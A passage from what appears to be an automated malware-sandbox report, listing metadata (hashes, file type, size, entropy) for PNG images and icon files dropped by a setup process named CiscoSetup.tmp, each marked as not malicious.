                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
